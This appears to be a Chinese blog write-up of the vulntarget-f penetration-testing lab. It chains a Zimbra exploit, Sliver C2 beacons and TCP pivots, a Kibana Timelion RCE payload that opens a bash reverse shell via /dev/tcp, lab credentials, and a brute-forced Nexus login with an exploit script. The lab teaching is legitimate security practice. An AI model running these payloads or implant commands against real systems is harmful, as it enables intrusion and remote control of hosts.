首页 > 其他分享 >Sliver C2 实战 vulntarget-f

Sliver C2 实战 vulntarget-f

时间:2024-02-08 13:11:06浏览次数:28  
标签:10.0 10.2 机器 -- tcp beacon C2 vulntarget Sliver

网络拓扑

host ip1 ip2
ubuntu(自用) 192.168.130.14 /
centos 192.168.130.3 10.0.10.2
ubuntu1 10.0.10.3
10.0.20.2
ubuntu2 10.0.20.3 /

信息收集

开放了很多端口,优先从web入手。
image
fscan 过一遍网站指纹,发现可能可以利用xxe。
image

zimbra cmk​​

去看443端口是一个名为zimbra​的cms。
image
在msf中搜到有可以利用的模块设置好参数run,稳定的情况下直接获得一个shell。
image

上线sliver

sliver生成配置文件,待会生成beacon,session一断开就无了。

profiles new beacon --mtls 192.168.130.14 --os linux --format elf --skip-symbols --seconds 5 --jitter 3 linux-beacon

image
开启web服务后下载生成的马子,赋权运行上线。
image
interactive​派生一个新的session会话,可以看到还有第二个子网。
image

提权

尝试一下提权,traitor来提权,提示可以使用CVE-2022-0847​。
image
但是失败了,此路不通。
image
传searchall上来搜搜有没有root的密码,将导出的结果下载下来,全局搜索可以找到类似登录的凭据root:vulntarget-f​,可以成功登录上。
image

内网横向

一层代理

没提权也不影响,先挂起代理,/etc/proxychains.conf​中添加一行 socks5 127.0.0.1 1081​。
image
上fscan直接扫,-hn过滤掉当前的机器和自己的物理机,发现了10.0.10.3​这个机器,似乎有未授权可以利用。
image
看看9200这个端口,有一些json数据。不过目前用起来sliver的代理还是很稳定的,比msf好多了,但是说回来没有什么特别的利用点。
image
再次进行端口扫描,这次指定一下从21开始到最大65535来扫就不会错过重要的,就发现了5601这个端口。
image

kibana rce

访问5601,是个名为kibana​的后台管理。
image
确认版本号,与复现的环境一样存在漏洞。
image
漏洞在timelion​这里,填入exp:

.es().props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/10.0.10.2/6666 0>&1\'");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

因为这台机器不出网,所以在外网cento os上nc -lvvp 6666​建立监听,之后再访问canvas​,过一会就会获得到shell了。这个很稳定断开了再开机监听还是会会连获得shell。
image

转发上线

为了更稳定的控制决定转移到sliver上继续操作。因为这台机器不出网,所以在外网机器的session中开启pivots​建立中转,指定参数--tcp-pivot​同时生成implant。

(UNAWARE_SPECIALIST) » pivots tcp --bind 10.0.10.2

[*] Started tcp pivot listener 10.0.10.2:9898 with id 1

 (UNAWARE_SPECIALIST) » pivots

 ID   Protocol   Bind Address     Number Of Pivots 
==<span style="font-weight: bold;" class="mark"> </span>======<span style="font-weight: bold;" class="mark"> </span>============<span style="font-weight: bold;" class="mark"> </span>================
  1   TCP        10.0.10.2:9898                  0 

 (UNAWARE_SPECIALIST) » generate beacon --tcp-pivot 10.0.10.2:9898 --os linux --format elf --skip-symbols 

[*] Generating new linux/amd64 beacon implant binary (1m0s)
[!] Symbol obfuscation is disabled
[*] Build completed in 13s
[*] Implant saved to /home/lockly/karplin/CHIEF_PENALTY

 (UNAWARE_SPECIALIST) » 

在外网的cento os上用python开起web服务(注意他是python2),但是当前的目录权限不足,迁移到/tmp​目录下下载。
image
下载成功之后赋权执行没有反应,官网上说仅仅支持session​,而我前面生成的时候指定了是beacon,去掉beacon重新生成,其他的和上面一样。
image
再次开启web服务,供内网机器10.0.10.3下载后赋权运行,获取到session会话。
image

提权

还是先尝试一下提权,传traitor上去执行,但还试了还是不行。
image

二层代理

无伤大雅,继续向内网横向,发现还存在一个网段。

 (ELEGANT_SEWER) » 
 (ELEGANT_SEWER) » ifconfig

+--------------------------------------+
| ens32                                |
+--------------------------------------+
| # | IP Addresses | MAC Address       |
+---+--------------+-------------------+
| 2 | 10.0.10.3/24 | 00:0c:29:f0:f4:ca |
+--------------------------------------+

+--------------------------------------+
| ens35                                |
+--------------------------------------+
| # | IP Addresses | MAC Address       |
+---+--------------+-------------------+
| 3 | 10.0.20.2/24 | 00:0c:29:f0:f4:d4 |
+--------------------------------------+
1 adapters not shown.

还是传fscan上去扫这个网段的存活主机和存在的服务,得到有一个10.0.20.3​机器。
image
再次对这台机器详细扫一下端口,结果还是这两个,8081这个站的标题为 Nexus Respository Manager​。
image
浏览器挂上新开的代理:
image
继续访问这台机器的8081端口,这里加载就要很久。
image

登录爆破

加载完之后如下:没有可以利用的地点,去搜了一下利用的方式需要先登录。
image
尝试在登录的地方用burpsuite爆破一下。
image
使用凭据admin:abcdef​成功登录后台。
image
在gayhub搜索相关的利用脚本,用这个脚本一键拿下shell,直接就是root权限。不过这次挂上代理不太稳定,最好是关掉socks重新开一下。
image
在内网机器上再次创建tcp中转,生成implant,然后python开启web服务,不同于外网机器,这台机器中的环境是python3,要用python -m http.server 8000​。

generate --tcp-pivot 10.0.20.2:9898 --os linux --format elf --skip-symbols

image
至此三台机器全部上线,查找一下有没有flag。
image
flag如下:
image

标签:10.0,10.2,机器,--,tcp,beacon,C2,vulntarget,Sliver
From: https://www.cnblogs.com/bktown/p/18011725/f-x8ydl

相关文章

  • WC2024
    最简单的一届WC。P10143[WC2024]代码堵塞难度:1拆贡献,考虑\(i\)选\(0\)还是\(1\):如果\(i\)选\(0\),那么它前面选\(0\)的加上它不超过\(T\)。如果\(i\)选\(1\),那么它后面选\(0\)的加上它和它前面的所有数不超过\(T\)。随便背包可以做到\(\mathcal{O}(nT......
  • WC2024 游记
    WC2024游记Day0&Day1见参考资料[1]。Day2今天是,上午题目选讲,下午讲量子计算。上午的东西不怎么感兴趣,摆摆摆。下午的东西感觉是有点意思的,听听听。可是有点不符合预期啊,前半部分讲了一堆没什么意义的科普,后半部分讲的量子算法又掉线了。那没办法了,摆摆摆。还是不能......
  • AT_abc270_g [ABC270G] Sequence in mod P 题解
    题目传送门前置知识大步小步算法解法递推式为\(x_{n}=(ax_{n-1}+b)\bmodp\),发现可以统一消去\(\bmodp\),只在最后参与计算。以下过程省去模运算。当\(x_{0}=t\)时,则\(n=0\)即为所求。当\(a=0,x_{0}\net\)时,递推式转化为\(x_{n}=b\bmodp\)。若\(b=t\),则......
  • THUPC2024-初赛
    哈哈,被干爆了。拖了cdqz哥后腿。题目使用协议来自THUPC2024(2024年清华大学学生程序设计竞赛暨高校邀请赛)初赛。以下『本仓库』皆指THUPC2024初赛官方仓库任何单位或个人都可以免费使用或转载本仓库的题目;任何单位或个人在使用本仓库题目时,应做到无偿、公开,严禁使用这......
  • AT_ddcc2019_final_a 题解
    原题传送门题目描述:企鹅经过$1$个雪地方格需要$1$秒,经过$1$个冰地方格需要$\frac{1}{(k+2)}$秒。$k$是紧接着冰雪方格之前的冰雪方格数。在企鹅开始之前,高桥可以把$1$个雪方块变成冰方块。问企鹅离开起点后到达终点最少需要多少时间?思路分析:这道题是模拟+贪心......
  • 【国产化】禁止使用不安全的密码算法:DES、RC2,RSA(1024位及以下),MD5,SHA1
    一、引言随着互联网的普及和技术的发展,网络安全问题日益严重。密码算法作为网络安全的基石,其安全性直接关系到用户数据的安全。一些不安全的密码算法不断被曝光,给用户带来了极大的安全隐患。二、不安全的密码算法1.DESDES(DataEncryptionStandard)是一种对称加密算法,自1977年......
  • WC2024 水镜
    考虑一张图,如下建边:\(h_i<h_{i+1}\):\((i,0)\to(i+1,0)\)\(h_i>h_{i+1}\):\((i,1)\to(i+1,1)\)\(h_i+h_{i+1}<L\):\((i,0)\to(i+1,1)\)\(h_i+h_{i+1}>L\):\((i,1)\to(i+1,0)\)所以说边只会改变\(n\)次,一共\(2n\)条边。对于每张图需要求出\(......
  • ABC240Ex Sequence of Substrings
    题意简述有长度为\(n\)的01串,你现在要选出\(k\)个两两无交子串,使得将\(k\)个子串按照出现位置排序后,后者的字典序严格比前者大。最大化\(k\)。\(\bm{n\le2\times10^4}\)。分析首先的首先观察数据范围可知此题应该是个线性根号对数的时间复杂度首先有个显然的\(O(n......
  • PKUWC2024游记
    省流:136+136Day-?模拟赛。一直犯唐氏错误,但赋值写成加能过样例是怎么回事呢。SNOID1T3用dinic跑不过去必须用二分图边染色又是怎么想到的(Kubic:二分图匹配总不会卡dinic)。GDKOID2T3使用分治和vector套vector又被卡了45pts,rp-=inf。Day-1看了一圈拉丁方题解,好像有用神秘分治......
  • WC2024 水镜
    洛谷传送门WC2024被打爆了,呜呜。我赛时会这题\(8\)分指数级暴力,哈哈。真不知道自己在干嘛。下文令\(T=2L\)。考虑如何判定一个序列\(a\)是否合法。考虑先枚举一个\(T\)。因为要求\(r_i<r_{i+1}\),考虑讨论相邻两项的取值:若\(a_i<a_{i+1}\)则\(r_i=a_i,......